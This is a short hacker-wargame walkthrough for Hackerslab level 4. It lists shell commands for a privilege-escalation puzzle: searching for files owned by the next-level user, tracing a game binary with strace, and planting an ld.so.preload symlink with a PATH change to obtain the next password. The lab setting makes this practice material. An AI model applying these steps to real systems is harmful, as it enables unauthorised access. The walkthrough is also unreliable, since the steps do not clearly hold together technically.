
::Hackerslab Guides::

::Web 6::

Last login: Sat Feb 21 09:15:03 from ACBF82A4.ipt.aol.com
[level4@drill level4]$

::Welcome to level4 hackerslab.org tutorial::
Kevin likes playing games in Linux. One day, he was bored and had nothing to do so he decided to play with a source file of the game. He opened the source file and added some codes and then compiled it. Get the password for the next level by using this program. HINT: Apparently, he added only one line into the source.

Your probably thinking, a game? How's that gonna help me get the pass? Well, watch and you'll see =).

*Step 1: The find command.(Results may vary)

[level4@drill level4]$ find / -user level5 -group level4 2>/dev/null
[level4@drill level4]$

*Step 2: Execute.

[level4@drill level4]$ strace /usr/games/trojka | more

Study this for a while, and you will see that the first command is "open /etc/ld.so.preload" So here is what you do.

*Step 3: Hack it.

[level4@drill level4]$ cd ../level4/tmp
[level4@drill tmp]$ mkdir etc
[level4@drill tmp]$ cd etc
[level4@drill etc]$ ln -s /bin/pass ld.so.preload
[level4@drill etc]$ cd ..
[level4@drill tmp]$ cd ..
[level4@drill level4]$ PATH=../level4/tmp
[level4@drill level4]$ exec /usr/games/trojka

Written by: Glitch

Site Design by: Glitch